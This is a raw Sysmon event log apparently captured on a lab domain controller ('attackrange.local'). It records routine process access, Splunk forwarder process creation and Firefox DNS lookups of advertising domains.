14:00:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018049Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018048Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018047Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:48.015{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9490-6005-4305-00000000A301}7076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018046Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:48.015{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9490-6005-4305-00000000A301}7076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018045Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:48.015{59A5CD1D-9490-6005-4305-00000000A301}7076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018075Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:49.880{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9491-6005-4505-00000000A301}6104C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018074Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:49.879{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018073Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:49.879{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018072Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:49.878{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018071Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:49.878{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018070Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:49.878{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9491-6005-4505-00000000A301}6104C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018069Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:49.878{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9491-6005-4505-00000000A301}6104C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018068Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:49.736{59A5CD1D-9491-6005-4505-00000000A301}6104C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x800000000000000018067Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.506{59A5CD1D-8E56-6005-2E00-00000000A301}2464217.14.101.151.in-addr.arpa.9003-C:\Windows\sysmon64.exe 10341000x800000000000000018077Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:53.862{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018076Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:53.838{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000018098Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.417{59A5CD1D-945A-6005-3305-00000000A301}7052ad.360yield.com0type: 5 ice.360yield.com;type: 5 eu2-ice.360yield.com;::ffff:52.58.204.249;::ffff:52.58.206.142;::ffff:52.59.77.252;::ffff:18.156.133.101;::ffff:18.194.102.50;::ffff:18.195.103.23;::ffff:35.156.171.204;::ffff:52.58.161.11;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018097Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.417{59A5CD1D-945A-6005-3305-00000000A301}7052e3120.g.akamaiedge.net0104.125.74.5;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018096Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.417{59A5CD1D-945A-6005-3305-00000000A301}7052des.smartclip.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018095Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.417{59A5CD1D-945A-6005-3305-00000000A301}7052ad.yieldlab.net0type: 5 yieldlab.net.edgekey.net;type: 5 e3120.g.akamaiedge.net;::ffff:104.125.74.5;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018094Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.415{59A5CD1D-945A-6005-3305-00000000A301}7052des.smartclip.net054.194.51.120;34.253.64.195;52.212.152.59;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018093Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.415{59A5CD1D-945A-6005-3305-00000000A301}7052des.smartclip.net0::ffff:52.212.152.59;::ffff:54.194.51.120;::ffff:34.253.64.195;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018092Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.088{59A5CD1D-945A-6005-3305-00000000A301}7052serving-126397893.us-east-1.elb.amazonaws.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018091Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.078{59A5CD1D-945A-6005-3305-00000000A301}7052serving-126397893.us-east-1.elb.amazonaws.com052.206.107.130;3.219.93.236;18.208.241.4;35.171.145.49;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018090Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.077{59A5CD1D-945A-6005-3305-00000000A301}7052go1.aniview.com0type: 5 serving-126397893.us-east-1.elb.amazonaws.com;::ffff:35.171.145.49;::ffff:52.206.107.130;::ffff:3.219.93.236;::ffff:18.208.241.4;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018089Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:53.973{59A5CD1D-945A-6005-3305-00000000A301}7052ocsp.sca1b.amazontrust.com013.224.195.149;13.224.195.167;13.224.195.228;13.224.195.13;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018088Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:53.972{59A5CD1D-945A-6005-3305-00000000A301}7052ocsp.sca1b.amazontrust.com0::ffff:13.224.195.13;::ffff:13.224.195.149;::ffff:13.224.195.167;::ffff:13.224.195.228;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018087Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:53.788{59A5CD1D-945A-6005-3305-00000000A301}7052tracking-1611167402.us-east-1.elb.amazonaws.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018086Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:53.786{59A5CD1D-945A-6005-3305-00000000A301}7052e11385.dscd.akamaiedge.net02a02:26f0:d6:49d::2c79;2a02:26f0:d6:4b5::2c79;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018085Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:53.784{59A5CD1D-945A-6005-3305-00000000A301}7052e11385.dscd.akamaiedge.net0104.76.201.111;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018084Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:53.783{59A5CD1D-945A-6005-3305-00000000A301}7052tracking-1611167402.us-east-1.elb.amazonaws.com052.45.78.137;52.200.134.48;54.88.105.203;3.234.114.38;34.197.221.162;34.226.149.251;34.237.70.43;35.171.5.130;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018083Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:53.783{59A5CD1D-945A-6005-3305-00000000A301}7052player.aniview.com0type: 5 wildcard.aniview.com.edgekey.net;type: 5 e11385.dscd.akamaiedge.net;::ffff:104.76.201.111;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018082Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:53.783{59A5CD1D-945A-6005-3305-00000000A301}7052tg1.aniview.com0type: 5 wildcard.aniview.com.edgekey.net;type: 5 e11385.dscd.akamaiedge.net;::ffff:104.76.201.111;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018081Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:53.782{59A5CD1D-945A-6005-3305-00000000A301}7052track1.aniview.com0type: 5 tracking-1611167402.us-east-1.elb.amazonaws.com;::ffff:35.171.5.130;::ffff:52.45.78.137;::ffff:52.200.134.48;::ffff:54.88.105.203;::ffff:3.234.114.38;::ffff:34.197.221.162;::ffff:34.226.149.251;::ffff:34.237.70.43;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018080Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:53.742{59A5CD1D-945A-6005-3305-00000000A301}7052org-481-0bf84-dmyt03fgsksh5xx.stackpathdns.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018079Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:53.733{59A5CD1D-945A-6005-3305-00000000A301}7052org-481-0bf84-dmyt03fgsksh5xx.stackpathdns.com0151.139.240.22;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018078Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:53.732{59A5CD1D-945A-6005-3305-00000000A301}7052481.hostedprebid.com0type: 5 org-481-0bf84-dmyt03fgsksh5xx.stackpathdns.com;::ffff:151.139.240.22;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018117Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:55.184{59A5CD1D-945A-6005-3305-00000000A301}7052ib.anycast.adnxs.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018116Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:55.183{59A5CD1D-945A-6005-3305-00000000A301}7052ib.anycast.adnxs.com037.252.172.249;37.252.172.250;37.252.173.22;37.252.173.27;37.252.173.38;37.252.172.36;37.252.172.37;37.252.172.38;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018115Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:55.182{59A5CD1D-945A-6005-3305-00000000A301}7052ib.adnxs.com0type: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:37.252.172.38;::ffff:37.252.172.249;::ffff:37.252.172.250;::ffff:37.252.173.22;::ffff:37.252.173.27;::ffff:37.252.173.38;::ffff:37.252.172.36;::ffff:37.252.172.37;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018114Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.917{59A5CD1D-945A-6005-3305-00000000A301}7052ad.sxp.smartclip.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018113Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.915{59A5CD1D-945A-6005-3305-00000000A301}7052ad.sxp.smartclip.net0108.129.22.238;18.203.106.202;34.249.113.204;34.252.138.191;52.16.235.163;52.48.209.167;54.72.218.85;54.220.16.187;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018112Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.914{59A5CD1D-945A-6005-3305-00000000A301}7052ad.sxp.smartclip.net0::ffff:54.220.16.187;::ffff:108.129.22.238;::ffff:18.203.106.202;::ffff:34.249.113.204;::ffff:34.252.138.191;::ffff:52.16.235.163;::ffff:52.48.209.167;::ffff:54.72.218.85;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018111Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.697{59A5CD1D-945A-6005-3305-00000000A301}7052te.ip-prod.aws-cbc.cloud9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018110Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.696{59A5CD1D-945A-6005-3305-00000000A301}7052te.ip-prod.aws-cbc.cloud018.193.155.163;52.58.23.232;18.184.89.128;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018109Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.695{59A5CD1D-8E56-6005-2E00-00000000A301}246422.240.139.151.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000018108Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.695{59A5CD1D-945A-6005-3305-00000000A301}7052te.technical-service.net0type: 5 te.ip-prod.aws-cbc.cloud;::ffff:18.184.89.128;::ffff:18.193.155.163;::ffff:52.58.23.232;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018107Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.659{59A5CD1D-8E56-6005-2E00-00000000A301}2464111.201.76.104.in-addr.arpa.0type: 12 a104-76-201-111.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 22542200x800000000000000018106Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.550{59A5CD1D-8E56-6005-2E00-00000000A301}246449.145.171.35.in-addr.arpa.0type: 12 ec2-35-171-145-49.compute-1.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000018105Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.549{59A5CD1D-8E56-6005-2E00-00000000A301}2464130.5.171.35.in-addr.arpa.0type: 12 ec2-35-171-5-130.compute-1.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000018104Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.423{59A5CD1D-945A-6005-3305-00000000A301}7052eqx.smartadserver.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018103Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.421{59A5CD1D-945A-6005-3305-00000000A301}7052eqx.smartadserver.com0185.86.137.17;185.86.137.32;185.86.137.113;185.86.137.114;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018102Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.420{59A5CD1D-945A-6005-3305-00000000A301}7052www9.smartadserver.com0type: 5 tmk-eqx-geoloc.smartadserver.com;type: 5 2-01-275d-0018.cdx.cedexis.net;type: 5 eqx.smartadserver.com;::ffff:185.86.137.114;::ffff:185.86.137.17;::ffff:185.86.137.32;::ffff:185.86.137.113;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018101Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.420{59A5CD1D-945A-6005-3305-00000000A301}7052eu2-ice.360yield.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018100Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 